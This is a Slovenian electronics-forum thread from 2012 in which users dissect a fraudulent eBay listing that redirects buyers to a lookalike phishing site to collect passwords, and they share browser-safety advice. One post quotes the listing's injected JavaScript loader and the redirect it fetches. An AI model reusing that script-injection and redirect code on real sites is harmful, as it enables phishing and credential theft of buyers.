www.elektronik.si Seznam forumov www.elektronik.si
Forum o elektrotehniki in računalništvu
 
 PomočPomoč  IščiIšči  Seznam članovSeznam članov  SkupineSkupine  StatisticsStatistika  AlbumAlbum  DatotekeFilemanager DokumentacijaDocDB LinksPovezave   Registriraj seRegistriraj se 
  PravilaPravila  LinksBolha  PriponkePriponke  KoledarKoledar  ZapiskiZapiski Tvoj profilTvoj profil Prijava za pregled zasebnih sporočilPrijava za pregled zasebnih sporočil PrijavaPrijava 

eBAY prevaranti - nepozornemu se lahko zgodi !!!
Pojdi na stran 1, 2, 3, 4  Naslednja
 
Objavi novo temo   Odgovori na to temo   Printer-friendly version    www.elektronik.si Seznam forumov -> Pranger
Poglej prejšnjo temo :: Poglej naslednjo temo  
Avtor Sporočilo
a.vidmar
Član
Član



Pridružen-a: Ned 08 Jul 2007 11:03
Prispevkov: 1137
Aktiv.: 5.58
Kraj: Postojna

PrispevekObjavljeno: Sre Mar 21, 2012 2:52 pm    Naslov sporočila:  eBAY prevaranti - nepozornemu se lahko zgodi !!! Odgovori s citatom

Prijatelj me je poklical in želel kupiti OH SPLOH plazmo, da je dobra cena..... 1200 GBP ????

OK bom pogledal :

Grem na njegov link in ??

http://www.ebay.co.uk/itm/Pioneer-Elite-Kuro-Signature-1080p-HD-Plasma-Television-PRO-101FD-50-/230764535450?pt=UK_AudioTVElectronics_Video_Televisions&hash=item35baa35e9a

Na prvi uč se mi zdi v redu, vendar v vrstici je

http://roverbay.co.uk/itm/Pioneer-Elite-Kuro-Signature-1080p-HD-Plasma-Television-PRO-101FD-50/230764535450/username/not

WTF ????

Po pozornem opazovanju in osveževanju strani in njeni zamrznitvi pred preusmeritvijo se opazi celo več slik.

V glavnem ne vem kako jim je to uspelo da iz https strani premakne na neko roverbay.co.uk stran.

Že v opisu je sumljivo da je potrebno uporabiti buy it now gumb in bančno transkacijo v originalu pa da sprejemajo paypal !!!!!
Če poizkusim aukcijo se mi izpiše naj kontaktiram email.
ČE poizkusim buy it now me vrže na prijavno okno !! Aha hočejo moje geslo.

eBay sem že opozoril, prilagam pa posnetke strani, če (ko) bo stran umaknjena.



prevara1.png
 Opis:
 Velikost datoteke:  248.38 KB
 Pogledana:  348 krat

prevara1.png



prevara2.png
 Opis:
če klikneš bid se pojavi email ;) ??
 Velikost datoteke:  249.32 KB
 Pogledana:  207 krat

prevara2.png



prevara3.png
 Opis:
 Velikost datoteke:  184.27 KB
 Pogledana:  185 krat

prevara3.png



originalna s slikami.png
 Opis:
 Velikost datoteke:  300.54 KB
 Pogledana:  169 krat

originalna s slikami.png


Nazaj na vrh
Odsoten Poglej uporabnikov profil Pošlji zasebno sporočilo
gumby
Član
Član



Pridružen-a: Sob 28 Apr 2007 12:32
Prispevkov: 4066
Aktiv.: 19.74

PrispevekObjavljeno: Sre Mar 21, 2012 4:03 pm    Naslov sporočila:   Odgovori s citatom

Pošlji na ebay tole, po moje jih bo zanimalo...
_________________
Tule nisem več aktiven.
Nazaj na vrh
Odsoten Poglej uporabnikov profil Pošlji zasebno sporočilo Pošlji E-sporočilo
igo
Član
Član



Pridružen-a: Sre 11 Okt 2006 19:11
Prispevkov: 3638
Aktiv.: 17.11

PrispevekObjavljeno: Sre Mar 21, 2012 5:17 pm    Naslov sporočila:   Odgovori s citatom

Tip zbira uporabniška imena in gesla.
Vsaj 30-krat sem se poskušal prijaviti s svojim ebay uporabniškim imenom: FACK in geslom OFF . Ne vem, zakaj tukaj ne deluje, če na ebayu deluje Rolling Eyes . Poskusite še vi. Morda bi moral A nadomestiti z U Wink . Morda bi moral oboje prevesti v slovenščino ali kak drug jezik ... Mr. Green .

_________________
Teoretično je praksa posledica teorije, praktično je pa ravno obratno. (igo 2001)
LP, Igor
Nazaj na vrh
Odsoten Poglej uporabnikov profil Pošlji zasebno sporočilo Pošlji E-sporočilo
PPG78
Član
Član



Pridružen-a: Ned 27 Jul 2003 14:09
Prispevkov: 2318
Aktiv.: 10.44
Kraj: Gorenjska

PrispevekObjavljeno: Sre Mar 21, 2012 5:58 pm    Naslov sporočila:   Odgovori s citatom

Zanimivo, me zanima kako je naredil preusmeritev iz originalne ebay strani na fake stran. Drugače na fake strani kar nekaj zadev (linkov) ne deluje in bi se morale vsakemu prižgati rdeče lučke.

Drugače pa je domena "sveža"
Koda:
Domain name:
        roverbay.co.uk

    Registrant:
        Ulrich Winkel

    Registrant type:
        UK Individual

    Registrant's address:
        Lindelburger
        Str. 25
        Pyrbaum
        90602
        Germany

    Registrar:
        1 & 1 Internet AG [Tag = SCHLUND]
        URL: http://www.1and1.co.uk or http://registrar.1und1.info

    Relevant dates:
        Registered on: 18-Mar-2012
        Renewal date:  18-Mar-2014
        Last updated:  18-Mar-2012

    Registration status:
        Registration request being processed.

    Name servers:
        ns65.1und1.de
        ns66.1und1.de
Nazaj na vrh
Odsoten Poglej uporabnikov profil Pošlji zasebno sporočilo Pošlji E-sporočilo
Waldo
Član
Član



Pridružen-a: Pet 02 Nov 2007 10:50
Prispevkov: 316
Aktiv.: 1.58
Kraj: Maribor

PrispevekObjavljeno: Sre Mar 21, 2012 6:42 pm    Naslov sporočila:   Odgovori s citatom

Server location: Republic of Moldova Liar
Pa original avkcija je že potekla.
Nazaj na vrh
Odsoten Poglej uporabnikov profil Pošlji zasebno sporočilo
a.vidmar
Član
Član



Pridružen-a: Ned 08 Jul 2007 11:03
Prispevkov: 1137
Aktiv.: 5.58
Kraj: Postojna

PrispevekObjavljeno: Sre Mar 21, 2012 6:48 pm    Naslov sporočila:   Odgovori s citatom

Ni potekla, sem prijavil kot prevaro.
Avkcija se bi morala izteči okrog polnoči.
Nazaj na vrh
Odsoten Poglej uporabnikov profil Pošlji zasebno sporočilo
xfce
Član
Član



Pridružen-a: Čet 28 Jul 2011 8:06
Prispevkov: 521
Aktiv.: 3.38

PrispevekObjavljeno: Sre Mar 21, 2012 8:13 pm    Naslov sporočila:   Odgovori s citatom

Zanimivo!!

Čudno, da ebay dopusti izvajanje javascript kode...

Koda:
<script type="text/javascript">

var

a = "SRC=";

b="http://jcmsale.elementfx.com/d48.[slovenščina je zame španska vas]";

c="</";

d="script";

document.write ("<script type='text/javascript'"+a+b+">"+c+d+">");

</script>



http://jcmsale.elementfx.com/d48.[slovenščina je zame španska vas]
Koda:

window.top.location.href = "http://roverbay.co.uk/itm/Pioneer-Elite-Kuro-Signature-1080p-HD-Plasma-Television-PRO-101FD-50/230764535450/username/not";
Nazaj na vrh
Odsoten Poglej uporabnikov profil Pošlji zasebno sporočilo
gregoral
Član
Član



Pridružen-a: Pet 24 Nov 2006 9:42
Prispevkov: 688
Aktiv.: 3.26
Kraj: Ljubljana

PrispevekObjavljeno: Sre Mar 21, 2012 9:59 pm    Naslov sporočila:   Odgovori s citatom

No nekaj informacij za boljše razumevanje:
- ebay nima kontrole nad tem katera javascript koda se lahko izvaja v brskalniku uporabnika
- ebay ima dejansko kontrolo samo nad tem kaj servira iz svojih stežnikov

Dejstvo je da ebay posreduje "podatke" ki jih vnese prodajalec in jih servira obiskovalcem.

V večini primerov to pomeni da posreduje tekst in slike oziroma tudi povezave do slik.

Hekerji pa so zviti in kot "tekst" pošiljajo marsikaj (recimo javascript).
Ebay take vnose seveda filtrira, ampak kaj ko so hekerji zelo iznajdljivi in vedno najdejo način da spravijo razne zadeve na strežnik.

Problem je ker danes večina strani za polno funkcionlnost potrebuje javascript.
Še večji problem je ker ima večina brskalnikov javascript vklopljen, uporabniki pa ne vedo kaj to pomeni in kaj se jim lahko zgodi.

Če imaš star brskalnik ki ima okvarjeno kodo za prikaz slik, si ogrožen že če eden od ebay prodajalcev da na oglas sliko ki ima noter nebodigatreba.

Če se da uporabljajte brskalnike ki imajo NoScript (ali ekvivalenten) dodatek.
Ta onemogoča izvajanje javascript kode na straneh.

Jaz sem tako gledal originalno stran ko sem odprl link,
je pa res da če bi hotel licitirati bi moral javascript nazaj vklopit.

Vseeno pa lahko pogledam večino oglasov na ebay brez javascript-a.
Večina oglasov ki jih pogledamo ni zanimiva za nakup, zato jih takoj zapremo.

Torej:
- pri nakupih zelo pazite kaj piše v naslovni vrstici
- če vas ponovno sprašuje za password je treba ponovno pogledat na naslov strani
- če se da uporabljajte NoScript in imejte javascript izklopljen
- še dodatno zaščito pa nudi RequestPolicy ki onemogoča še slike ki niso iz istega strežnika

Res pa je da večina normalnih uporabnikov potem sprašuje:
Ja zakaj moram pa potem zmeraj javascript vklapljat?
A se ne nebi dalo tega kar izkopit?

Odprejo pa vse priponke ki jim jih pošljejo prijateljice in sodelavci in ...
Pri tem seveda tip priponke ni pomemben,
važno je le da takoj odprem SuperMineSweeper.exe, ker je menda zakon.

No bom nehal dolgovezit,
lp, Gregor
Nazaj na vrh
Odsoten Poglej uporabnikov profil Pošlji zasebno sporočilo
.
Član
Član



Pridružen-a: Pon 23 Avg 2004 16:16
Prispevkov: 16777190
Aktiv.: 75555.92

PrispevekObjavljeno: Sre Mar 21, 2012 10:16 pm    Naslov sporočila:   Odgovori s citatom

Brisana vsebina odstranjenega uporabnika.
Nazaj na vrh
Odsoten Poglej uporabnikov profil Pošlji zasebno sporočilo
Srecko
Član
Član



Pridružen-a: Čet 25 Dec 2003 21:29
Prispevkov: 1006
Aktiv.: 4.53
Kraj: Okolica Cerkna

PrispevekObjavljeno: Čet Mar 22, 2012 9:03 pm    Naslov sporočila:   Odgovori s citatom

Kako pa se v Firefoxsu izklopi ta javascript? Very Happy

LP Srečko

_________________
Samouk
Tukaj sem doma
Nazaj na vrh
Odsoten Poglej uporabnikov profil Pošlji zasebno sporočilo
poule
Član
Član



Pridružen-a: Čet 11 Jan 2007 19:53
Prispevkov: 800
Aktiv.: 3.82
Kraj: Ljubljana

PrispevekObjavljeno: Čet Mar 22, 2012 9:37 pm    Naslov sporočila:   Odgovori s citatom

Firefox ima dodatek "NoScript
noscript
Nazaj na vrh
Odsoten Poglej uporabnikov profil Pošlji zasebno sporočilo
.
Član
Član



Pridružen-a: Pon 23 Avg 2004 16:16
Prispevkov: 16777190
Aktiv.: 75555.92

PrispevekObjavljeno: Čet Mar 22, 2012 9:38 pm    Naslov sporočila:   Odgovori s citatom

Brisana vsebina odstranjenega uporabnika.
Nazaj na vrh
Odsoten Poglej uporabnikov profil Pošlji zasebno sporočilo
kastaneda
Član
Član



Pridružen-a: Pet 23 Okt 2009 11:18
Prispevkov: 458
Aktiv.: 2.61

PrispevekObjavljeno: Pet Mar 23, 2012 9:01 am    Naslov sporočila:   Odgovori s citatom

igo je napisal/a:
Tip zbira uporabniška imena in gesla.
Vsaj 30-krat sem se poskušal prijaviti s svojim ebay uporabniškim imenom: FACK in geslom OFF . Ne vem, zakaj tukaj ne deluje... Mr. Green .


Preverjanje imena na ebay-u:

https://signin.ebay.com/ws/eBayISAPI.dll

Preverjanje imena tukaj:

http://rroverbay.co.uk/ws/eBayISAPI.dll

Moldavijec ima verjetno "resne" namene... Mr. Green

_________________
LP
Srečko
Nazaj na vrh
Skrit Poglej uporabnikov profil Pošlji zasebno sporočilo
lojzek
Član
Član



Pridružen-a: Pet 25 Jan 2008 8:00
Prispevkov: 3352
Aktiv.: 17.02

PrispevekObjavljeno: Pet Jan 02, 2015 5:47 pm    Naslov sporočila:   Odgovori s citatom

//*****************************************//
//************ 2015 *************************//
//*****************************************//

Sicer res nisem bil že kak teden na ebay-u, sedaj pa hoče, da resetiram geslo....

Nekaj mi ne štima v internetnem naslovu:

https://fyp.ebay.co.uk/dcp/?reqinput=ba9ada3354ed957cfac998d9a70f2a58135ee87acf9f7658b3abfafbf02fcc172491825412ee96adf5dd84fd5feea3dc&ru=http%3A%2F%2Fwww.ebay.com


Mnenja? Think
Nazaj na vrh
Odsoten Poglej uporabnikov profil Pošlji zasebno sporočilo
elektronik1982
Član
Član



Pridružen-a: Pet 18 Maj 2012 5:53
Prispevkov: 101
Aktiv.: 0.70
Kraj: Maribor

PrispevekObjavljeno: Pet Jan 02, 2015 6:04 pm    Naslov sporočila:   Odgovori s citatom

lojzek: fyp.ebay.co.uk je ebay-eva poddomena. FYP morda pomeni 'forgot your password'. fyp.ebay.co.uk resolva v 66.135.209.105, kar so ebay-evi strezniki, tako da mislim, da te nima kaj skrbeti.
Nazaj na vrh
Odsoten Poglej uporabnikov profil Pošlji zasebno sporočilo
Pokaži sporočila:   
Objavi novo temo   Odgovori na to temo   Printer-friendly version    www.elektronik.si Seznam forumov -> Pranger Časovni pas GMT + 2 uri, srednjeevropski - poletni čas
Pojdi na stran 1, 2, 3, 4  Naslednja
Stran 1 od 4

 
Pojdi na:  
Ne, ne moreš dodajati novih tem v tem forumu
Ne, ne moreš odgovarjati na teme v tem forumu
Ne, ne moreš urejati svojih prispevkov v tem forumu
Ne, ne moreš brisati svojih prispevkov v tem forumu
Ne ne moreš glasovati v anketi v tem forumu
Ne, ne moreš pripeti datotek v tem forumu
Ne, ne moreš povleči datotek v tem forumu

Uptime: 47 dni


Powered by phpBB © 2001, 2005 phpBB Group